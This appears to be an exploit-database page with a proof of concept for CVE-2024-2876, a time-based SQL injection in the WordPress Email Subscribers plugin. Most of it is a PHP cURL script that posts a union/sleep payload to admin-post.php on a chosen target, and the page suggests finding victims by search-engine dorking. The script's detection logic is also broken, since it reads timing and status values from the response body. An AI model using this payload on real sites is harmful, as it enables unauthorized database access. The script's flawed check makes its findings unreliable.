Share
## https://sploitus.com/exploit?id=PACKETSTORM:216388
=============================================================================================================================================
    | # Title     : wordpress Email Subscribers 5.7.14 Sql Injection vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/email-subscribers/                                                                            |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: The Email Subscribers โ€“ Email Marketing, Newsletters, Automation for WordPress and WooCommerce plugin for WordPress is vulnerable to SQL Injection
    
        (Related : https://packetstorm.news/files/id/188767/ Related CVE numbers:	CVE-2024-2876 ) .
    	
    [+] Payload : 
    
    [+] Set Target : line 52.
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    // CVE-2024-2876: SQL Injection Wordpress
    // Author: indoushka
    
    
    // Function to perform the SQL Injection test using cURL
    function test_sql_injection($hostname) {
        $url = "http://{$hostname}/wp-admin/admin-post.php";
        $postFields = "page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111";
        
        $headers = [
            "Host: {$hostname}",
            "Content-Type: application/x-www-form-urlencoded",
        ];
        
        // Initialize cURL session
        $ch = curl_init();
        
        // Set cURL options
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout set to 20 seconds
        
        // Execute cURL and get the response
        $response = curl_exec($ch);
        
        // Check if cURL request was successful
        if(curl_errno($ch)) {
            echo "cURL Error: " . curl_error($ch);
        } else {
            // Check for response characteristics (DSL conditions)
            $duration = substr($response, strpos($response, "duration") + 9, 4); // Adjust as needed based on response structure
            $status_code = substr($response, strpos($response, "status_code") + 12, 3); // Adjust as needed
            $header = substr($response, strpos($response, "header") + 7, 100); // Adjust based on actual response
            
            // Conditions matching (duration, status_code, header content)
            if ($duration >= 4 && $status_code == 200 && strpos($header, "application/json") !== false) {
                echo "SQL Injection vulnerability found!\n";
            } else {
                echo "No vulnerability detected.\n";
            }
        }
        
        // Close cURL session
        curl_close($ch);
    }
    
    // Example usage (Replace {{Hostname}} with the target hostname)
    $hostname = 'example.com';  // Change this to your target
    test_sql_injection($hostname);
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================